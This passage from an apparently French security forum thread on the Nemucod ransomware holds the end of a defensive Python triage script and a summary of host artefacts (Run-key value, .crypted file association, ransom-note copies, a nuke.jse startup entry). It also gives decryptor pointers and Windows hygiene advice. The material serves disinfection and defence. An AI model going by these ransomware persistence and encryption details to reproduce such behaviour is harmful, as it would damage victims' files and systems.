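    r"C:\Users\user\Documents\report.docx",        # untouched
    r"C:\Users\user\Documents\notes.txt.crypted",  # .txt is not on the target list
    r"C:\Users\user\Desktop\DECRYPT.txt",          # the dropped note
]

if __name__ == "__main__":
    summary = triage(SAMPLE_CMD)
    for k, v in summary.items():
        print(f"{k}: {v}")
    print("renamed files:", flag_renamed_files(SAMPLE_HOST_FILES, summary))
```

Run over the full script above instead of the excerpt, `triage` reports 26 drive loops and 79 targeted extensions, plus the `Crypted` Run-key value, the `HKCR\.crypted` association that opens the note in Notepad, and the two desktop copies of `DECRYPT.txt`; those are the host artefacts to search for during disinfection.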
Decrypting Nemucod

Get the Nemucod Decryptor provided on the following page: Decryption tools (Decrypt Tools Ransomware)
Other vendors also offer recovery tools.

Go to the page:

Securing your Windows

To secure your Windows and avoid ransomware and the other threats known on the web, follow the tutorial on securing your Windows.
=> Securing your Windows.
First basic security rule: think first, then click, not the other way round. Files/programs are like sweets: when they come from a stranger, you don't accept them!
How to protect your PC from viruses
Windows 11: compatibility, minimum system requirements, download the ISO and install Windows 11

How to ask for help on the forum
Share malekal.com: feel free to share the articles you like on the site's Facebook page.
Malekal_morte
Posts: 116656
Joined: 10 Sept. 2005 13:57

Re: Ransomware Nemucod (Crypto-Ransomware)

by Malekal_morte »

The Nemucod ransomware is back in early February 2017 with the .JSE extension:
Ransomware .jse (Nemucod)
Office and PDF documents turned into .jse

Businesses appear to be targeted.
Malekal_morte
Posts: 116656
Joined: 10 Sept. 2005 13:57

Re: Ransomware Nemucod (Crypto-Ransomware)

by Malekal_morte »

Back with a new startup entry:
Startup: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nuke.jse [2017-10-02] ()